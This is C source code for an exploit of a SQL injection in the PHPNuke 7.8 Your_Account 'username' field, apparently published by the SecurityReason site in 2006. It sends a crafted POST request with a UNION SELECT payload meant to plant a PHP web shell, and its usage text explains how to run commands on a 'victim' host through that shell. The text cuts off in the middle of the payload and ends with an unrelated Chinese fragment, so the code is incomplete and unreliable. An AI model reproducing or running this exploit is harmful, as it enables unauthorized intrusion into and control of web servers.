/*==================================================\ # SecurityReason.com | # ( sp3x ) sp3x@securtiyreason.com | # | # /---------------------------\ | # | Ctitical SQL INCJECTION | | # | PHPNuke <= 7.8 | | # \---------------------------/ | # | # PHPNuke-sp3x[1] | # This exploit is based on 'username' | # SQL injection vuln in Your_Account module. | # | # References: | # securityreason.com/achievement_securityalert/32 | # | # ---| work only on mysql version > 4.0 |--- | # | #==================================================*/ #include #include #include #include #include #include #include #define PORT 80 // port of the web server void begin(void); void sqlinj(int sock, char *argv[]); int main(int argc, char *argv[]){ int sock; struct sockaddr_in addr; struct hostent *hp=0; if(argc!=4) { begin(); } if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("\n\n[-] Creating socket [FAILED]\n\n"); exit(EXIT_FAILURE); } printf("\n\n[+] Creating socket [OK]\n"); if((hp = gethostbyname(argv[1])) == 0) { printf("[-] Resolving %s [FAILED]\n\n", argv[1]); exit(EXIT_FAILURE); } printf("[+] Resolving %s [OK]\n", argv[1]); memset(&addr,0,sizeof(addr)); memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) { printf("[-] Connecting at %s [FAILED]\n\n", argv[1]); exit(EXIT_FAILURE); } printf("[+] Connecting at %s [OK]\n", argv[1]); sqlinj(sock, argv); printf("[+] Now check the shell\n" "[+] http://%s\n\n",argv[1]); shutdown(sock, 2); close(sock); return(0); } void begin(void){ printf("*---------------------------------------*\n" "* SecurityReason *\n" "* EXPLOIT for PHPNuke <=7.8 *\n" "* Coded by : sp3x Date : 16.02.2006 *\n" "*---------------------------------------*\n\n" " Usage : \n" " PHPNuke-sp3x[1] HOST /[path_phpnuke] [s_directory]\n\n" " HOST - Host where is phpnuke example: localhost \n" " [path_phpnuke] - PHPNuke directory\n" " [s_directory] - shell directory where to upload\n\n" " Example :\n\n" " PHPNuke-sp3x[1] www.victim.com /phpnuke/html/ /home/sp3x/nuke78/html/shell.php \n" " After this go to http://www.victim.com/phpnuke/html/shell.php?sr=ls \n\n"); exit(0); return; } void sqlinj(int sock, char *argv[]){ FILE *go; int size = 264; go = fdopen(sock,"a"); if (go == 0) { perror("[-] fdopen [FAILED]\n\n"); close(sock); exit(EXIT_FAILURE); } setbuf(go,NULL); size+=strlen(argv[3]); fprintf(go,"POST %s HTTP/1.0\n" "Connection: Keep-Alive\n" "Pragma: no-cache\n" "Cache-control: no-cache\n" "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n" "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n" "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n" "Accept-Language: en\n" "Host: %s\n" "Referer: http://%s%s?name=Your_Account&op=new user\n" "User-Agent: SecurityReason - [SR]\n" "Content-Type: application/x-www-form-urlencoded\n" "Content-Length: %d\n\n" "name=Your_Account&op=new user&user_email=securitybreak@securityreason.com&" "user_password=hackme&user_password2=hackme&username=" "s'/**/UNION/**/SELECT/**/'

亚洲欧美在线